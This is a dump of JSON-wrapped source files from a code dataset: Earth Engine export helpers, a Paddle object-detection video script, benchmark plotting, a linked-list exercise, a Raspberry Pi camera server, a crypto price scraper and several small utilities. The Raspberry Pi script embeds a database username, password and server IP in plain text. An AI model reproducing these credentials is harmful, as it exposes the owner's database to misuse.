asset')\n return asset_id, description\n\n\ndef _first_asset_root():\n asset_roots = [bucket['id'] for bucket in ee.data.listBuckets()['assets']]\n if not asset_roots:\n raise Exception('User has no GEE asset roots: {}'.format(ee.Credentials()))\n return asset_roots[0]\n\n\ndef _export_to_asset(credentials, create_task, description, retries):\n def create_observable():\n return execute(credentials, create_task, description=description).pipe(\n flat_map(lambda task: delete_asset(credentials, task.asset_id).pipe(\n flat_map(lambda _: execute_task(credentials, task))\n ))\n )\n\n return _export(\n credentials,\n create_observable=create_observable,\n description=description,\n retries=retries\n )\n\n\ndef _export_to_drive(credentials, create_task, description, retries):\n return _export(\n credentials,\n create_observable=lambda: execute_task(credentials, create_task()),\n description=description,\n retries=retries\n )\n\n\n# Work (i.e. exports) is grouped by credentials, limiting concurrent exports per credentials\n_ee_exports = WorkQueue(\n concurrency_per_group=5,\n description='earth-engine-exports'\n)\n\n\ndef _export(credentials, create_observable, description, retries):\n return concat(\n progress(\n default_message='Submitting export task to Google Earth Engine...',\n message_key='tasks.ee.export.pending'\n ),\n enqueue(\n credentials,\n queue=_ee_exports,\n action=create_observable,\n description=description,\n retries=retries\n )\n )\n","sub_path":"modules/google-earth-engine/docker/sepal-ee/sepal/ee/rx/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"134720482","text":"from paddle.inference import Config\nfrom functools import reduce\nimport os\nimport cv2\nimport yaml\nfrom paddle.inference import create_predictor\nimport paddle\nimport numpy as np\nfrom paddel_version.preprocess import preprocess,create_inputs,Resize,NormalizeImage,Permute,PadStride,LetterBoxResize\nfrom paddel_version.visualize import visualize_box_mask\npaddle.enable_static()\n\n\n\nclass PredictConfig():\n \"\"\"读取配置文件\n Args:\n model_dir (str): root path of model.yml\n \"\"\"\n def __init__(self, model_dir):\n # parsing Yaml config for Preprocess\n deploy_file = os.path.join(model_dir, 'infer_cfg.yml')\n with open(deploy_file) as f:\n yml_conf = yaml.safe_load(f)\n\n self.arch = yml_conf['arch']\n self.preprocess_infos = yml_conf['Preprocess']\n self.min_subgraph_size = yml_conf['min_subgraph_size']\n self.labels = yml_conf['label_list']\n self.mask = False\n self.use_dynamic_shape = yml_conf['use_dynamic_shape']\n if 'mask' in yml_conf:\n self.mask = yml_conf['mask']\n self.tracker = None\n if 'tracker' in yml_conf:\n self.tracker = yml_conf['tracker']\n self.print_config()\n\n def print_config(self):\n print('----------- Model Configuration -----------')\n print('%s: %s' % ('Model Arch', self.arch))\n print('%s: ' % ('Transform Order'))\n for op_info in self.preprocess_infos:\n print('--%s: %s' % ('transform op', op_info['type']))\n print('--------------------------------------------')\n\nclass Detector(object):\n \"\"\"\n Args:\n pred_config (object): config of model, defined by `Config(model_dir)`\n model_dir (str): root path of model.pdiparams, model.pdmodel and infer_cfg.yml\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16)\n batch_size (int): size of pre batch in inference\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n cpu_threads (int): cpu threads\n enable_mkldnn (bool): whether to open MKLDNN\n \"\"\"\n\n def __init__(self,\n pred_config,\n model_dir,\n device='GPU',\n run_mode='fluid',\n batch_size=1,\n trt_min_shape=1,\n trt_max_shape=1280,\n trt_opt_shape=640,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n self.pred_config = pred_config\n self.predictor, self.config = load_predictor(\n model_dir,\n run_mode=run_mode,\n batch_size=batch_size,\n min_subgraph_size=self.pred_config.min_subgraph_size,\n device=device,\n use_dynamic_shape=self.pred_config.use_dynamic_shape,\n trt_min_shape=trt_min_shape,\n trt_max_shape=trt_max_shape,\n trt_opt_shape=trt_opt_shape,\n trt_calib_mode=trt_calib_mode,\n cpu_threads=cpu_threads,\n enable_mkldnn=enable_mkldnn)\n # self.det_times = Timer()\n self.cpu_mem, self.gpu_mem, self.gpu_util = 0, 0, 0\n\n def preprocess(self, image_list):\n preprocess_ops = []\n for op_info in self.pred_config.preprocess_infos:\n new_op_info = op_info.copy()\n op_type = new_op_info.pop('type')\n preprocess_ops.append(eval(op_type)(**new_op_info))\n\n input_im_lst = []\n input_im_info_lst = []\n for im_path in image_list:\n im, im_info = preprocess(im_path, preprocess_ops)\n input_im_lst.append(im)\n input_im_info_lst.append(im_info)\n inputs = create_inputs(input_im_lst, input_im_info_lst)\n return inputs\n\n def postprocess(self,\n np_boxes,\n np_masks,\n inputs,\n np_boxes_num,\n threshold=0.5):\n # postprocess output of predictor\n results = {}\n results['boxes'] = np_boxes\n results['boxes_num'] = np_boxes_num\n if np_masks is not None:\n results['masks'] = np_masks\n return results\n\n def predict(self, image_list, threshold=0.5, warmup=0, repeats=1):\n '''\n Args:\n image_list (list): list of image\n threshold (float): threshold of predicted box' score\n Returns:\n results (dict): include 'boxes': np.ndarray: shape:[N,6], N: number of box,\n matix element:[class, score, x_min, y_min, x_max, y_max]\n MaskRCNN's results include 'masks': np.ndarray:\n shape: [N, im_h, im_w]\n '''\n # self.det_times.preprocess_time_s.start()\n inputs = self.preprocess(image_list)\n # self.det_times.preprocess_time_s.end()\n np_boxes, np_masks = None, None\n input_names = self.predictor.get_input_names()\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n for i in range(warmup):\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n boxes_tensor = self.predictor.get_output_handle(output_names[0])\n np_boxes = boxes_tensor.copy_to_cpu()\n if self.pred_config.mask:\n masks_tensor = self.predictor.get_output_handle(output_names[2])\n np_masks = masks_tensor.copy_to_cpu()\n\n # self.det_times.inference_time_s.start()\n for i in range(repeats):\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n boxes_tensor = self.predictor.get_output_handle(output_names[0])\n np_boxes = boxes_tensor.copy_to_cpu()\n boxes_num = self.predictor.get_output_handle(output_names[1])\n np_boxes_num = boxes_num.copy_to_cpu()\n if self.pred_config.mask:\n masks_tensor = self.predictor.get_output_handle(output_names[2])\n np_masks = masks_tensor.copy_to_cpu()\n # self.det_times.inference_time_s.end(repeats=repeats)\n #\n # self.det_times.postprocess_time_s.start()\n results = []\n if reduce(lambda x, y: x * y, np_boxes.shape) < 6:\n print('[WARNNING] No object detected.')\n results = {'boxes': np.array([[]]), 'boxes_num': [0]}\n else:\n results = self.postprocess(\n np_boxes, np_masks, inputs, np_boxes_num, threshold=threshold)\n # self.det_times.postprocess_time_s.end()\n # self.det_times.img_num += len(image_list)\n return results\n\n # def get_timer(self):\n # return self.det_times\n\ndef load_predictor(model_dir,\n run_mode='fluid',\n batch_size=1,\n device='GPU',\n min_subgraph_size=3,\n use_dynamic_shape=False,\n trt_min_shape=1,\n trt_max_shape=1280,\n trt_opt_shape=640,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n \"\"\"set AnalysisConfig, generate AnalysisPredictor\n Args:\n model_dir (str): root path of __model__ and __params__\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16/trt_int8)\n use_dynamic_shape (bool): use dynamic shape or not\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n Returns:\n predictor (PaddlePredictor): AnalysisPredictor\n Raises:\n ValueError: predict by TensorRT need device == 'GPU'.\n \"\"\"\n if device != 'GPU' and run_mode != 'fluid':\n raise ValueError(\n \"Predict by TensorRT mode: {}, expect device=='GPU', but device == {}\"\n .format(run_mode, device))\n config = Config(\n os.path.join(model_dir, 'model.pdmodel'),\n os.path.join(model_dir, 'model.pdiparams'))\n if device == 'GPU':\n # initial GPU memory(M), device ID\n config.enable_use_gpu(200, 0)\n # optimize graph and fuse op\n config.switch_ir_optim(True)\n elif device == 'XPU':\n config.enable_xpu(10 * 1024 * 1024)\n else:\n config.disable_gpu()\n config.set_cpu_math_library_num_threads(cpu_threads)\n if enable_mkldnn:\n try:\n # cache 10 different shapes for mkldnn to avoid memory leak\n config.set_mkldnn_cache_capacity(10)\n config.enable_mkldnn()\n except Exception as e:\n print(\n \"The current environment does not support `mkldnn`, so disable mkldnn.\"\n )\n pass\n\n precision_map = {\n 'trt_int8': Config.Precision.Int8,\n 'trt_fp32': Config.Precision.Float32,\n 'trt_fp16': Config.Precision.Half\n }\n if run_mode in precision_map.keys():\n config.enable_tensorrt_engine(\n workspace_size=1 << 10,\n max_batch_size=batch_size,\n min_subgraph_size=min_subgraph_size,\n precision_mode=precision_map[run_mode],\n use_static=False,\n use_calib_mode=trt_calib_mode)\n\n if use_dynamic_shape:\n min_input_shape = {\n 'image': [batch_size, 3, trt_min_shape, trt_min_shape]\n }\n max_input_shape = {\n 'image': [batch_size, 3, trt_max_shape, trt_max_shape]\n }\n opt_input_shape = {\n 'image': [batch_size, 3, trt_opt_shape, trt_opt_shape]\n }\n config.set_trt_dynamic_shape_info(min_input_shape, max_input_shape,\n opt_input_shape)\n print('trt set dynamic shape done!')\n\n # disable print log when predict\n config.disable_glog_info()\n # enable shared memory\n config.enable_memory_optim()\n # disable feed, fetch OP, needed by zero_copy_run\n config.switch_use_feed_fetch_ops(False)\n predictor = create_predictor(config)\n return predictor, config\n\n\ndef predict_video(detector, camera_id,video_file=None,output_dir=None,threshold=0.5):\n if camera_id != -1:\n capture = cv2.VideoCapture(camera_id)\n video_name = 'output.mp4'\n else:\n capture = cv2.VideoCapture(video_file)\n video_name = os.path.split(video_file)[-1]\n fps = 30\n frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))\n print('frame_count', frame_count)\n width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))\n # yapf: disable\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n # fourcc = cv2.VideoWriter_fourcc(*'mpeg')\n # yapf: enable\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n out_path = os.path.join(output_dir, video_name)\n writer = cv2.VideoWriter(out_path, fourcc, fps, (width, height))\n index = 1\n while (1):\n ret, frame = capture.read()\n if not ret:\n break\n print('detect frame:%d' % (index))\n index += 1\n results = detector.predict([frame], threshold)\n\n im = visualize_box_mask(\n frame,\n results,\n detector.pred_config.labels,\n threshold=threshold)\n\n\n im = np.array(im)\n\n writer.write(im)\n im_1 = im\n\n\n\n # c = cv2.waitKey(1) & 0xff\n # if c == 27:\n # capture.release()\n # break\n\n # if camera_id != -1:\n # cv2.imshow('Mask Detection', im)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n writer.release()\n\nif __name__ == '__main__':\n model_dir = 'D:\\\\xiangmu\\\\AI_match\\\\output_inference\\\\ssd_vgg16_300_240e_voc'\n camera_id = 0\n out_dir = 'D:\\\\xiangmu\\\\AI_match\\\\GUI\\\\output'\n\n pred_config = PredictConfig(model_dir)\n detector = Detector(pred_config,model_dir)\n print(pred_config.arch)\n print(pred_config.mask)\n predict_video(detector,camera_id,output_dir=out_dir)\n pass","sub_path":"paddel_version/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":12823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67640845","text":"import os\nimport sys\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# sns.set()\nfrom plots.plot_utils import BLUE, DARK_GREY, set_matplotlib_params\nfrom utils.utils import ensure_dir_exists\n\nsystem_1_xticks = [0, 100, 200, 300, 400, 500, 600, 700]\nsystem_1_xmax = 700\n\nsystem_2_xticks = [0, 500, 1000, 1500, 2000]\nsystem_2_xmax = 2000\n\nmeasurements = {\n 'system_1_atari':\n dict(filename='10_core_atari.csv',\n x_ticks=system_1_xticks,\n y_ticks=[10000, 20000, 30000, 40000, 50000],\n x_max=system_1_xmax,\n y_max=51000,\n y_label=False),\n 'system_1_doom':\n dict(filename='10_core_vizdoom.csv',\n x_ticks=system_1_xticks,\n y_ticks=[10000, 20000, 30000, 40000, 50000, 60000],\n x_max=system_1_xmax,\n y_max=61000,\n y_label=False),\n 'system_1_dmlab':\n dict(filename='10_core_dmlab.csv',\n x_ticks=system_1_xticks,\n y_ticks=[2000, 4000, 6000, 8000, 10000, 12000, 14000, 16000],\n x_max=system_1_xmax,\n y_max=16000,\n y_label=False),\n 'system_2_atari':\n dict(filename='36_core_atari.csv',\n x_ticks=system_2_xticks,\n y_ticks=[20000, 40000, 60000, 80000, 100000, 120000, 140000],\n x_max=system_2_xmax,\n y_max=143000,\n y_label=False),\n 'system_2_doom':\n dict(filename='36_core_vizdoom.csv',\n x_ticks=system_2_xticks,\n y_ticks=[20000, 40000, 60000, 80000, 100000, 120000, 140000],\n x_max=system_2_xmax,\n y_max=150000,\n y_label=False),\n 'system_2_dmlab':\n dict(filename='36_core_dmlab.csv',\n x_ticks=system_2_xticks,\n y_ticks=[10000, 20000, 30000, 40000, 50000],\n x_max=system_2_xmax,\n y_max=50000,\n y_label=False),\n}\n\ntitles = {\n 'system_1_atari': 'Atari throughput, System #1',\n 'system_1_doom': 'VizDoom throughput, System #1',\n 'system_1_dmlab': 'DMLab throughput, System #1',\n 'system_2_atari': 'Atari throughput, System #2',\n 'system_2_doom': 'VizDoom throughput, System #2',\n 'system_2_dmlab': 'DMLab throughput, System #2',\n}\n\nset_matplotlib_params()\n\nplt.rcParams['figure.figsize'] = (10.0, 4.0) #(2.5, 2.0) 7.5, 4\n\n\ndef build_plot(name, measurement, ax, count):\n # data = pd.read_csv(join('data', measurement['filename']))\n data = pd.read_csv(measurement['filename'])\n\n x = data.values[:, 0]\n\n # Sample Factory\n\n sf_y = data.values[:, 1]\n\n # rlpyt\n rlpyt_y = data.values[:, 2]\n\n # rllib\n rllib_y_p1 = data.values[:, 3]\n\n # rllib_x_p2 = rllib.values[4::, 0]\n # rllib_y_p2 = rllib.values[4::, 1]\n\n # scalable_agent\n sa_y_p1 = data.values[:, 4].astype('float')\n # sa_x_p2 = scalable_agent.values[2::, 0]\n # sa_y_p2 = scalable_agent.values[2::, 1]\n\n # seed-rl\n seedrl_y_p1 = data.values[:, 5]\n\n mkfunc = lambda x, pos: '%1.1fM' % (x * 1e-6) if x >= 1e6 else '%dK' % int(x * 1e-3) if x >= 1e3 else '%d' % int(x)\n mkformatter = matplotlib.ticker.FuncFormatter(mkfunc)\n ax.yaxis.set_major_formatter(mkformatter)\n\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.spines['bottom'].set_linewidth(1.0)\n\n # ax.set_axisbelow(True)\n # for spine in ax.spines.values():\n # spine.set_visible(False)\n\n # Title and label\n title = titles[name]\n ax.set_title(title, fontsize=8)\n if count >= 3:\n ax.set_xlabel('Num. environments', fontsize=8)\n\n if count % 3 == 0:\n ax.set_ylabel('FPS, frameskip = 4', fontsize=8)\n\n # for spine in ax.spines.values():\n # spine.set_visible(False)\n\n # hide tick of axis\n ax.xaxis.tick_bottom()\n ax.yaxis.tick_left()\n ax.tick_params(which='major', length=0)\n\n # use logarithmic for x axis! NOT A GOOD IDEA\n # plt.xscale('symlog')\n\n # let trim and label seems light\n # ax.tick_params(colors='gray', direction='out')\n # for tick in ax.get_xticklabels():\n # tick.set_color('gray')\n # for tick in ax.get_yticklabels():\n # tick.set_color('gray')\n\n # let plot a little bit larger\n # draw dash gray grid lines\n ax.grid(color='#B3B3B3', linestyle='--', linewidth=0.25, alpha=0.2, dashes=(15, 10))\n ax.xaxis.grid(False)\n ax.set_xlim(xmin=0, xmax=measurement['x_max'])\n ax.set_ylim(ymin=0, ymax=measurement['y_max'])\n # plt.grid(False)\n\n ax.ticklabel_format(style='plain', axis='x', scilimits=(0, 0))\n # plt.ticklabel_format(style='sci', axis='y', scilimits=(5, 5))\n\n ax.set_xticks(measurement['x_ticks'])\n ax.set_yticks(measurement['y_ticks'])\n\n # plot each line\n\n # color {'b', 'g', 'r', 'c', 'm'}\n # Not good {'y', 'k', 'w'}\n # sample factory\n marker_size = 3.3\n lw = 2.0\n\n sf_plot, = ax.plot(x, sf_y, color='#FF7F0E', label='SampleFactory APPO', marker=\"o\", markersize=marker_size, linewidth=lw)\n\n # seed-rl\n seed_rl, = ax.plot(x, seedrl_y_p1, color=BLUE, label='SeedRL V-trace', marker=\"o\", markersize=marker_size, linewidth=lw) # label='scalable_agent',\n\n # plt.plot(rllib_x_p1, rllib_y_p1, color='skyblue', label='rllib',marker=\"o\")\n rllib_p1, = ax.plot(x, rllib_y_p1, color='#2CA02C', label='RLlib IMPALA', marker=\"o\", markersize=marker_size, linewidth=lw)\n # rllib_p2, = plt.plot(rllib_x_p2, rllib_y_p2, color='#2CA02C', marker='x', markersize=marker_size_cross, linestyle=\":\")\n\n # scalable_agent\n sa_p1, = ax.plot(x, sa_y_p1, color='#d62728', label='DeepMind IMPALA', marker=\"o\", markersize=marker_size, linewidth=lw) # label='scalable_agent',\n # sa_p2, = plt.plot(sa_x_p2, sa_y_p2, color='#d62728', marker=\"x\", markersize=marker_size_cross, linestyle=\":\")\n\n # rlpyt\n rlpyt_plot, = ax.plot(x, rlpyt_y, color=DARK_GREY, label='rlpyt PPO', marker=\"o\", markersize=marker_size, linewidth=lw)\n\n # plot legend\n # sa_legend = plt.legend([sf_plot, rlpyt_plot, (rllib_p1, rllib_p2), (sa_p1, sa_p2)],\n # ['SampleFactory', 'rlpyt', 'rllib', 'IMPALA'], numpoints=1,\n # handler_map={tuple: HandlerTuple(ndivide=None)}, prop={'size': 7})\n # sa_legend.get_frame().set_linewidth(0.25)\n\n\ndef main():\n # requirements\n # 1) dark background\n # 2) both axis should start at 0\n # 3) Legend should be on background\n # 4) Legend should not obstruct data\n # 5) Export in eps\n # 6) Markers. Little circles for every data point\n # 7) Dashed lines for missing data\n fig, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(2, 3)\n count = 0\n\n ax = (ax1, ax2, ax3, ax4, ax5, ax6)\n for name, measurement in measurements.items():\n build_plot(name, measurement, ax[count], count)\n count += 1\n\n handles, labels = ax[-1].get_legend_handles_labels()\n # fig.legend(handles, labels, loc='upper center')\n # lgd = fig.legend(handles, labels, bbox_to_anchor=(0., 1.02, 1., .102), loc='lower left', ncol=4, mode=\"expand\")\n lgd = fig.legend(handles,\n labels,\n bbox_to_anchor=(0.05, 0.88, 0.9, 0.5),\n loc='lower left',\n ncol=5,\n mode=\"expand\")\n lgd.set_in_layout(True)\n\n # plt.show()\n plot_name = 'throughput'\n # plt.subplots_adjust(wspace=0.05, hspace=0.15)\n # plt.margins(0, 0)\n # plt.tight_layout(rect=(0, 0, 1, 1.2))\n # plt.subplots_adjust(bottom=0.2)\n\n plt.tight_layout(rect=(0, 0, 1.0, 0.9))\n # plt.show()\n\n plot_dir = ensure_dir_exists(os.path.join(os.getcwd(), '../final_plots'))\n\n plt.savefig(os.path.join(plot_dir, f'../final_plots/{plot_name}.pdf'),\n format='pdf',\n bbox_extra_artists=(lgd,))\n # plt.savefig(os.path.join(os.getcwd(), f'../final_plots/{plot_name}.pdf'), format='pdf', bbox_inches='tight', pad_inches=0, bbox_extra_artists=(lgd,))\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"plots/throughput/throughput_plot.py","file_name":"throughput_plot.py","file_ext":"py","file_size_in_byte":8036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"601816906","text":"##클래스와 함수 선언 부분\r\nclass Node():\r\n def __init__(self):\r\n self.data = None\r\n self.link = None\r\n\r\ndef printNodes(start):\r\n current = start\r\n if current == None :\r\n return\r\n print(current.data, end = ' ')\r\n while current.link != None:\r\n current = current.link\r\n print(current.data, end = ' ')\r\n print()\r\n\r\ndef findNode(findData):\r\n global memory, head, current, pre\r\n\r\n current = head\r\n if current.data == findData:\r\n return current\r\n while current.link != None :\r\n current = current.link\r\n if current.data == findData:\r\n return current\r\n return Node()\r\n\r\n#전역 변수 선언 부분\r\nmemory = []\r\nhead, current, pre = None, None, None\r\ndataArray = [\"a\",\"b\",\"c\",\"d\",\"e\"]\r\n\r\n##메인 코드\r\nif __name__ == \"__main__\" :\r\n\r\n node = Node()\r\n node.data = dataArray[0]\r\n head = node\r\n memory.append(node)\r\n\r\n for data in dataArray[1:]:\r\n pre = node\r\n node = Node()\r\n node.data = data\r\n pre.link = node\r\n memory.append(node)\r\n\r\n printNodes(head)\r\n\r\n fNode = findNode(\"a\")\r\n print(fNode.data)\r\n\r\n fNode = findNode(\"c\")\r\n print(fNode.data)\r\n\r\n fNode = findNode(\"1\")\r\n print(fNode.data)","sub_path":"PycharmProjects/pythonProject/단순 연결 리스트의 노드 검색 함수.py","file_name":"단순 연결 리스트의 노드 검색 함수.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"411232012","text":"import RPi.GPIO as g\nimport picamera\nimport time\n\nimport pandas as pd\nimport pymysql\nfrom sqlalchemy import create_engine\nfrom PIL import Image\nimport base64\nfrom io import BytesIO\nimport socket\n\ng.setmode(g.BCM)\nKEY = 4\ng.setup(KEY,g.IN)\n\ns = socket.socket() \nhost = '192.168.137.213'\nport = 1234 \ns.bind((host, port)) \ns.listen(5)\n\ntextname = 'info.txt'\nfilename = 'test.jpg'\nraspberryPiID = ''\ncameraID = ''\n\nwith open(textname, mode = 'r') as f:\n text = f.read()\n textSplit = text.split(' ')\n raspberryPiID = textSplit[0]\n cameraID = textSplit[1]\n\nwhile True:\n c, addr = s.accept()\n if not c:\n continue\n else:\n print ('Got connection from', addr)\n break\n\ncount = 0\ntry:\n while 1:\n time.sleep(1)\n if g.input(KEY):\n count = count + 1\n if count > 3:\n count = 0\n print('capture')\n with picamera.PiCamera() as camera:\n camera.resolution=(512, 512)\n camera.capture(filename)\n \n dte = time.localtime()\n Year = dte.tm_year\n Mon = dte.tm_mon\n Day = dte.tm_mday\n WDay = dte.tm_wday\n Hour = dte.tm_hour\n Min = dte.tm_min\n Sec = dte.tm_sec\n photoID = str(Year) + '_' + str(Mon) + '_' + str(Day) + '_' + str(Hour) + '_' + str(Min) + '_' + str(Sec);\n \n engine = create_engine('mysql+pymysql://hello:Csedbadmin!1@13.125.102.154/pytest', echo = False)\n buffer = BytesIO()\n im = Image.open(filename)\n\n im.save(buffer, format='jpeg')\n img_str = base64.b64encode(buffer.getvalue())\n \n img_df = pd.DataFrame({'data':[img_str]})\n img_df.to_sql('images', con=engine, if_exists='append', index=False)\n \n answer = raspberryPiID + ' ' + cameraID + ' ' + photoID\n print(answer)\n c.send(answer.encode())\nexcept KeyboardInterrupt:\n answer = 'end'\n c.send(answer.encode())\nc.close\ng.cleanup()\n\n","sub_path":"raspberryPi/fsrServerTest.py","file_name":"fsrServerTest.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"385405852","text":"#! /usr/bin/env python3\n# # coding=utf-8\n'''\nThis program will request the html of a given link. It will then\nscrape the html for tags to gather data and return each row of data.\nIt will then create a data frame using pandas.\n\nCharlie Say\nCS 161 10:00AM\n\n___PSEUDO__\n\nrequest for downloaded html with provided link\nscrape the site and parse it into a readable format\nsearch for tags to gather data\n\ndata frame:\n input each row from beautifulsoup\n create a list of lists\n create each row in data frame\n parse data\n creata data frame\n return data frame to graph\n\n'''\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nfrom datetime import datetime as dt\n\n\n# litecoin_link = 'https://coinmarketcap.com/currencies/litecoin/historical-data/?start=20190101&end=20190305'\n# ethereum_link = 'https://coinmarketcap.com/currencies/ethereum/historical-data/?start=20190101&end=20190305'\n# bitcoin_link = 'https://coinmarketcap.com/currencies/bitcoin/historical-data/?start=20190101&end=20190305'\n\n\ndef bitcoin(link):\n '''\n Request the site with a link and scrape it with beautifulsoup.\n Find all tags with 'tr' which will give us the data we need from the site.\n Return all the rows we find with the tag 'tr' in the html of the site.\n '''\n bitcoin_r = requests.get(link)\n bitcoin_soup = BeautifulSoup(bitcoin_r.text, 'html.parser')\n bitcoin_table = bitcoin_soup.find('div', attrs={'class':'table-responsive'})\n rows = bitcoin_table.find_all('tr')\n return(rows)\n\ndef ethereum(link):\n '''\n Request the site with a link and scrape it with beautifulsoup.\n Find all tags with 'tr' which will give us the data we need from the site.\n Return all the rows we find with the tag 'tr' in the html of the site.\n '''\n ethereum_r = requests.get(link)\n ethereum_soup = BeautifulSoup(ethereum_r.text, 'html.parser')\n ethereum_table = ethereum_soup.find('div', attrs={'class':'table-responsive'})\n rows = ethereum_table.find_all('tr')\n return(rows)\n\ndef litecoin(link):\n '''\n Request the site with a link and scrape it with beautifulsoup.\n Find all tags with 'tr' which will give us the data we need from the site.\n Return all the rows we find with the tag 'tr' in the html of the site.\n '''\n litecoin_r = requests.get(link)\n litecoin_soup = BeautifulSoup(litecoin_r.text, 'html.parser')\n litecoin_table = litecoin_soup.find('div', attrs={'class':'table-responsive'})\n rows = litecoin_table.find_all('tr')\n return(rows)\n \n\ndef data(input_rows):\n '''\n Create a list from the rows of data we gather using the parent node 'div' which\n is the tag 'tr'. This is the data we want. Append the data onto another list to\n export as a pandas data frame.\n '''\n\n data = []\n \n i = 0 # begin count\n for row in input_rows: # iterate through each row with tag 'tr' (table read)\n data_org = [] # make a list of lists\n find_children = row.findChildren() # find child nodes of parent node 'div' class='table'\n\n for children in find_children:\n data_org.append(children.text) # append all the 'child nodes'. data for each day.\n\n if(i > 0):\n data_org[0] = data_org[0].replace(',','') # remove comma in date string\n data_org[5] = data_org[5].replace(',','') # remove comma in total volume\n data_org[6] = data_org[6].replace(',','') # remove comma in market cap\n data.append({'date':dt.strptime(data_org[0], '%b %d %Y'), # format the date\n 'open':float(data_org[1]), # turn string in list into floats, append to main list\n 'high':float(data_org[2]), # make data into a dictionary\n 'low':float(data_org[3]),\n 'close':float(data_org[4]),\n 'volume':float(data_org[5]),\n 'marketcap':float(data_org[6])})\n\n i = i + 1 # counter\n \n data_frame = pd.DataFrame(data)\n return(data_frame)\n # data_frame.to_csv('somefile.csv', sep='\\t', index=False)\n \n\n\n\n\n\n\n ","sub_path":"FINAL PROJECT/cryptofuncs.py","file_name":"cryptofuncs.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"480255672","text":"#!/usr/bin/env python3\n\"\"\"\nFile Name : Problem119.py\nDate started : 2013-01-18\nDate solved : 2013-01-18\nRun Time : 0.01130 seconds\n\nThe number 512 is interesting because it is equal to the sum of its digits\n raised to some power: 5 + 1 + 2 = 8, and 8^3 = 512. Another example of\n a number with this property is 614656 = 28^4.\n\nWe shall define a_n to be the n-th term of this sequence\n and insist that a number must contain at least two digits to have a sum.\n\nYou are given that a_2 = 512 and a_10 = 614656.\n\nFind a_30.\n\n\n\nhttp://oeis.org/A023106\n\n\"\"\"\n\nimport project_euler\n\n\nPROBLEM_NUMBER = 119\nSOLVED = 1\n\n\ndef _sum_digits(n):\n return sum(map(int, str(n)))\n\n\ndef problem119(input_=None):\n count = 0\n ret = 0\n i = 2\n while count < 31:\n for power in range(2, 30):\n n = pow(i, power)\n if _sum_digits(n) == i:\n ret = n\n count += 1\n i += 1\n return ret\n\n\n\ndef run():\n print(project_euler.print_timing(problem119))\n\n\nif __name__ == \"__main__\":\n run()\n\n","sub_path":"problems/Problem119.py","file_name":"Problem119.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"353190587","text":"from typing import Optional\n\n\ndef parse_user_trades(trdMatchID: Optional[str] = None):\n\n # KRAKEN INPUT FORMAT (for all trades)\n # type = type of trade (optional)\n # all = all types (default)\n # any position = any position (open or closed)\n # closed position = positions that have been closed\n # closing position = any trade closing all or part of a position\n # no position = non-positional trades\n # trades = whether or not to include trades related to position in output (optional. default = false)\n # start = starting unix timestamp or trade tx id of results (optional. exclusive)\n # end = ending unix timestamp or trade tx id of results (optional. inclusive)\n # ofs = result offset\n\n # KRAKEN INPUT FORMAT (for single trade)\n # txid = comma delimited list of transaction ids to query info about (20 maximum)\n # trades = whether or not to include trades related to position in output (optional. default = false)\n if trdMatchID:\n return {\"txid\": trdMatchID, \"trades\": \"true\"}\n\n return {\"trades\": \"true\"}","sub_path":"src/noobit/models/data/request/parse/kraken/user_trades.py","file_name":"user_trades.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"182949178","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext as _\n\nfrom project.cache import cache_factory\n\nfrom ..forms import CityForm\nfrom ..models import City, Domain\n\n\n@admin.register(City)\nclass CityAdmin(admin.ModelAdmin):\n \"\"\"Админ-панель модели ``City``.\n\n Attributes:\n form (django.forms.ModelForm): Форма для выбора часовых поясов в выпадающем списке с автозаполнением.\n list_display (tuple): Поля для отображения в списке записей.\n list_per_page (int): Количество объектов на одной странице при пагинации.\n prepopulated_fields (dict): Поля для автозаполнения из значения других 